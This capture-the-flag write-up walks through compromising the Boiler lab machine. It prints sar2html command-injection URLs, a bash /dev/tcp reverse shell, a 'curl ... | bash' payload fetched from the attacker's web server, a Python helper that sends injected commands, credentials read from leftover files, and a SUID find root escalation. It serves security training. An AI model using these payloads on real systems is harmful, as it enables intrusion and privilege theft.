THM Writeup – Boiler CTF
Intermediate level CTF. Just enumerate, you’ll get there.
Add the target IP address to your hosts file:
echo '10.10.128.43 boiler.thm' >> /etc/hosts
Scan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv boiler.thm
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
80/tcp open http syn-ack ttl 64
10000/tcp open snet-sensor-mgmt syn-ack ttl 64
55007/tcp open unknown syn-ack ttl 64
Get more details about open ports:
nmap -T4 -A -p 21,80,10000,55007 boiler.thm
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.152.162
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
| 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (EdDSA)
As we can see in the Nmap output, anonymous FTP login is allowed.
Login to FTP and list files:
root@attackbox:~# ftp boiler.thm
Connected to boiler.thm.
220 (vsFTPd 3.0.3)
Name (boiler.thm:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 ..
-rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt
226 Directory send OK.
Download the file, we might need it later:
ftp> get .info.txt
local: .info.txt remote: .info.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.00 secs (1.3315 MB/s)
ftp>
Enumeration
Now, when we browse to http://boiler.thm:10000/ we get an error page: the server is running in SSL mode, so we need to use https://boiler.thm:10000/ instead.
Webmin 1.930 is the release that fixed the CVE-2019-15107 remote code execution bug, but it is cheap to confirm. Search for a Webmin exploit, paste the checker script into a file, make it executable and run it against the target:
root@attackbox:~# nano exploitwebmin
root@attackbox:~# chmod +x exploitwebmin
root@attackbox:~# ./exploitwebmin https://boiler.thm:10000/
Testing for RCE (CVE-2019-15107) on https://boiler.thm:10000/: OK! (target is not vulnerable)
Now take a look at port 80 – browse to http://boiler.thm/:
There is only Apache Ubuntu Default Page…
Directory brute-force the web application on port 80:
gobuster dir -u http://boiler.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)
/server-status (Status: 403)
===============================================================
Now scan the joomla directory:
dirb http://boiler.thm/joomla
---- Scanning URL: http://boiler.thm/joomla/ ----
==> DIRECTORY: http://boiler.thm/joomla/_archive/
==> DIRECTORY: http://boiler.thm/joomla/_database/
==> DIRECTORY: http://boiler.thm/joomla/_files/
==> DIRECTORY: http://boiler.thm/joomla/_test/
==> DIRECTORY: http://boiler.thm/joomla/~www/
==> DIRECTORY: http://boiler.thm/joomla/administrator/
==> DIRECTORY: http://boiler.thm/joomla/bin/
==> DIRECTORY: http://boiler.thm/joomla/build/
==> DIRECTORY: http://boiler.thm/joomla/cache/
==> DIRECTORY: http://boiler.thm/joomla/components/
==> DIRECTORY: http://boiler.thm/joomla/images/
==> DIRECTORY: http://boiler.thm/joomla/includes/
+ http://boiler.thm/joomla/index.php (CODE:200|SIZE:12474)
==> DIRECTORY: http://boiler.thm/joomla/installation/
==> DIRECTORY: http://boiler.thm/joomla/language/
==> DIRECTORY: http://boiler.thm/joomla/layouts/
==> DIRECTORY: http://boiler.thm/joomla/libraries/
==> DIRECTORY: http://boiler.thm/joomla/media/
==> DIRECTORY: http://boiler.thm/joomla/modules/
==> DIRECTORY: http://boiler.thm/joomla/plugins/
==> DIRECTORY: http://boiler.thm/joomla/templates/
==> DIRECTORY: http://boiler.thm/joomla/tests/
==> DIRECTORY: http://boiler.thm/joomla/tmp/
...
More enumeration
Browse to http://boiler.thm/joomla/_archive/:
Browse to http://boiler.thm/joomla/_database/:
The text looks rotated (a Caesar/ROT-style letter shift). Use CyberChef to decode it:
Browse to http://boiler.thm/joomla/_files/:
This text is Base64-encoded. Use CyberChef again:
The first decode yields another Base64 string, so it has to be Base64-decoded twice before it reads as plain text.
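The two decodes above are exactly the kind of thing worth scripting when a CTF box scatters encoded hints across directories. The following is an added example, not code from the original writeup, and it works on constructed sample strings rather than the text from the target: it brute-forces every Caesar/ROT shift and picks the one that produces the most common English words (the same reasoning CyberChef's ROT13 recipe shortcuts), and it peels nested Base64 layer by layer until the result stops looking like Base64, which is what the _files page needed twice. The English word list is a small assumed heuristic, not a dictionary.

```python
import base64
import binascii
import re
import string

# Tiny assumed word list used to score decrypted candidates (heuristic, not a dictionary).
ENGLISH_COMMON = {
    "the", "and", "you", "for", "not", "with", "this", "that", "here", "look",
    "are", "is", "in", "it", "to", "of", "a",
}
# A Base64 blob after whitespace is stripped: alphabet characters plus up to two '=' pads.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def rotate(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift` positions (ROT13 is shift 13); other characters are left alone."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def best_rotation(text: str) -> tuple:
    """Try all 25 non-trivial shifts and return (shift, plaintext) for the candidate
    containing the most common English words."""
    best_shift, best_text, best_score = 0, text, -1
    for shift in range(1, 26):
        candidate = rotate(text, shift)
        words = re.findall(r"[a-z]+", candidate.lower())
        score = sum(word in ENGLISH_COMMON for word in words)
        if score > best_score:
            best_shift, best_text, best_score = shift, candidate, score
    return best_shift, best_text


def peel_base64(data: str, max_layers: int = 8) -> tuple:
    """Base64-decode repeatedly while the current text is valid Base64 that decodes to
    printable ASCII. Returns (layers_removed, final_text); a plain sentence with spaces
    or punctuation fails the alphabet check and stops the loop."""
    current = data
    layers = 0
    while layers < max_layers:
        compact = re.sub(r"\s+", "", current)  # tolerate line-wrapped blobs
        if len(compact) % 4 != 0 or not B64_RE.match(compact):
            break
        try:
            decoded = base64.b64decode(compact, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not all(ch in string.printable for ch in decoded):
            break  # decoded to binary garbage, so the input was not really Base64
        current = decoded
        layers += 1
    return layers, current.strip()


# Constructed sample inputs for this example (not the strings from the target).
PLAIN_ROT = "Nothing interesting here, look in the other directories"
SAMPLE_ROT13 = rotate(PLAIN_ROT, 13)
PLAIN_B64 = "no flags in this directory, keep enumerating"
SAMPLE_NESTED_B64 = base64.b64encode(base64.b64encode(PLAIN_B64.encode())).decode()

if __name__ == "__main__":
    print(best_rotation(SAMPLE_ROT13))
    print(peel_base64(SAMPLE_NESTED_B64))
```

Both helpers are deliberately conservative: `best_rotation` only reports a shift, so you still eyeball the result, and `peel_base64` stops as soon as a layer decodes to something that is not printable ASCII, which keeps it from mangling a flag that merely happens to look like Base64.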
Browse to http://boiler.thm/joomla/_test/:
This directory hosts a sar2html instance, and that is finally something interesting.
Getting reverse shell
Let’s search for an exploit:
root@attackbox:~# searchsploit sar2html
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Sar2HTML 3.2.1 - Remote Command Execution | php/webapps/47204.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Copy the text file to the current directory:
root@attackbox:~# searchsploit -m php/webapps/47204.txt
Exploit: Sar2HTML 3.2.1 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/47204
Path: /opt/searchsploit/exploits/php/webapps/47204.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /root/47204.txt
Now read the exploit instructions:
root@attackbox:~# cat 47204.txt
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.
This is great, we have a remote code execution vulnerability here.
First try a simple command, e.g. http://boiler.thm/joomla/_test/index.php?plot=;id :
It works, we can see the command output in the drop-down list.
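Reading command output out of a `<select>` element gets tedious after the second request, and payloads with spaces, slashes and pipes have to be percent-encoded once they leave the browser's address bar. The following is an added example, not code from the original writeup or from the sar2html exploit: it builds the injected URL with proper encoding and extracts the drop-down entries from a constructed response fragment. The `Select Host` placeholder text and the target path are assumptions about the form; adjust them to what the real page returns.

```python
import html
import re
import urllib.parse
import urllib.request

# Assumed location of the sar2html instance, taken from the enumeration above.
TARGET = "http://boiler.thm/joomla/_test/index.php"

# Matches each <option ...>text</option> in the host drop-down.
OPTION_RE = re.compile(r"<option[^>]*>(.*?)</option>", re.IGNORECASE | re.DOTALL)


def build_plot_url(base: str, command: str) -> str:
    """Prefix the command with ';' and percent-encode everything (spaces, ':', '/', '|', '&')
    so it survives the query string exactly as typed."""
    return base + "?plot=" + urllib.parse.quote(";" + command, safe="")


def extract_options(page: str) -> list:
    """Return the visible text of every <option> in the page, HTML-unescaped and trimmed."""
    return [html.unescape(m.strip()) for m in OPTION_RE.findall(page)]


def command_output(page: str, placeholders=("Select Host",)) -> list:
    """Drop the form's own placeholder entries (assumed to be 'Select Host') and keep the
    remaining lines, which are the injected command's stdout."""
    return [opt for opt in extract_options(page) if opt and opt not in placeholders]


def run_command(base: str, command: str, timeout: float = 10) -> list:
    """Send the injected request and return the command's output lines.
    Needs network access; the offline sample below does not call it."""
    url = build_plot_url(base, command)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return command_output(resp.read().decode("utf-8", "replace"))


# Constructed response fragment imitating the drop-down after plot=;id (not captured from the target).
SAMPLE_RESPONSE = """
<select name="host">
  <option value="">Select Host</option>
  <option value="uid=33(www-data) gid=33(www-data) groups=33(www-data)">
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
  </option>
</select>
"""

if __name__ == "__main__":
    print(build_plot_url(TARGET, "id"))
    print(command_output(SAMPLE_RESPONSE))
```

With `run_command(TARGET, "id")` you get the same `uid=33(www-data)` line back as a Python list, and the encoding in `build_plot_url` is what makes the later `curl ... | bash` payload arrive intact when sent from a script instead of a browser.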
Now let’s get a reverse shell. Open another terminal window and start a netcat listener:
nc -lnvp 4242
Create a file named shell.sh with this content:
bash -i >& /dev/tcp/10.10.152.162/4242 0>&1
Edit the IP address and port to match your listener.
Run python web server:
python3 -m http.server
And use the injection to fetch and run it:
curl 10.10.152.162:8000/shell.sh | bash
Like this (the browser percent-encodes the spaces and the pipe for you; if you send the request with curl instead, quote or encode the URL yourself):
http://boiler.thm/joomla/_test/index.php?plot=;curl 10.10.152.162:8000/shell.sh | bash
We get a reverse shell:
Upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg   (then press Enter twice)
stty rows 30 columns 100
export TERM=xterm-256color
Lateral movement
Look around – list files and folders:
www-data@Vulnerable:/var/www/html/joomla/_test$ ls -la
total 124
drwxr-xr-x 3 www-data www-data 4096 Aug 22 2019 .
drwxr-xr-x 25 www-data www-data 4096 Aug 22 2019 ..
-rwxr-xr-x 1 www-data www-data 53430 Aug 22 2019 index.php
-rwxr-xr-x 1 www-data www-data 716 Aug 21 2019 log.txt
-rwxr-xr-x 1 www-data www-data 53165 Mar 19 2019 sar2html
drwxr-xr-x 3 www-data www-data 4096 Aug 22 2019 sarFILE
Read the log.txt file:
www-data@Vulnerable:/var/www/html/joomla/_test$ cat log.txt
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: [REDACTED]
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
The log leaks a username (basterd) and, in the trailing comment, a password.
See what users we have on this machine:
www-data@Vulnerable:/var/www/html/joomla/_test$ ls -la /home/
total 16
drwxr-xr-x 4 root root 4096 Aug 22 2019 .
drwxr-xr-x 22 root root 4096 Aug 22 2019 ..
drwxr-x--- 3 basterd basterd 4096 Aug 22 2019 basterd
drwxr-x--- 3 stoner stoner 4096 Aug 22 2019 stoner
Great, so we probably have basterd’s password.
Try to switch to user basterd:
www-data@Vulnerable:/var/www/html/joomla/_test$ su basterd
Password:
basterd@Vulnerable:/var/www/html/joomla/_test$
We are now the basterd user, check his home directory:
basterd@Vulnerable:/var/www/html/joomla/_test$ cd ~
basterd@Vulnerable:~$ ls -la
total 16
drwxr-x--- 3 basterd basterd 4096 Aug 22 2019 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
-rwxr-xr-x 1 stoner basterd 699 Aug 21 2019 backup.sh
-rw------- 1 basterd basterd 0 Aug 22 2019 .bash_history
drwx------ 2 basterd basterd 4096 Aug 22 2019 .cache
There is an interesting file, backup.sh. Read it:
basterd@Vulnerable:~$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#[REDACTED]
ssh $USER@$REMOTE mkdir $TARGET/$DATE
if [ -d "$SOURCE" ]; then
for i in `ls $SOURCE | grep 'data'`;do
echo "Begining copy of" $i >> $LOG
scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
echo $i "completed" >> $LOG
if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
rm $SOURCE/$i
echo $i "removed" >> $LOG
echo "####################" >> $LOG
else
echo "Copy not complete" >> $LOG
exit 0
fi
done
else
echo "Directory is not present" >> $LOG
exit 0
fi
The commented-out line right after USER=stoner is most likely stoner’s password, left in the script for the ssh/scp calls.
Try to switch to user stoner:
basterd@Vulnerable:~$ su stoner
Password:
stoner@Vulnerable:/home/basterd$
And we are logged in as stoner.
Check stoner’s home directory:
stoner@Vulnerable:/home/basterd$ cd ~
stoner@Vulnerable:~$ ls -la
total 16
drwxr-x--- 3 stoner stoner 4096 Aug 22 2019 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret
stoner@Vulnerable:~$ cat .secret
[REDACTED]
The .secret file holds the user flag.
Privilege escalation
Now we need to escalate our privileges – see what our user can do with sudo:
stoner@Vulnerable:~$ sudo -l
User stoner may run the following commands on Vulnerable:
(root) NOPASSWD: /NotThisTime/MessinWithYa
Nothing useful here, that sudo entry is a decoy.
Check files (executables) that have SUID bit set:
stoner@Vulnerable:~$ find / -type f -perm -4000 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
The executable that stands out is find.
GTFOBins shows how to abuse a SUID find: -exec runs a program as the file owner (root here), and bash -p keeps that elevated effective UID instead of dropping it.
So give it a try:
stoner@Vulnerable:~$ find . -exec /bin/bash -p \; -quit
bash-4.3# id
uid=1000(stoner) gid=1000(stoner) euid=0(root) groups=1000(stoner),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
bash-4.3#
Success: our effective UID (euid) is root, while the real uid stays stoner, which is exactly why the -p flag to bash was needed.
Read the root flag:
bash-4.3# cat /root/root.txt
[REDACTED]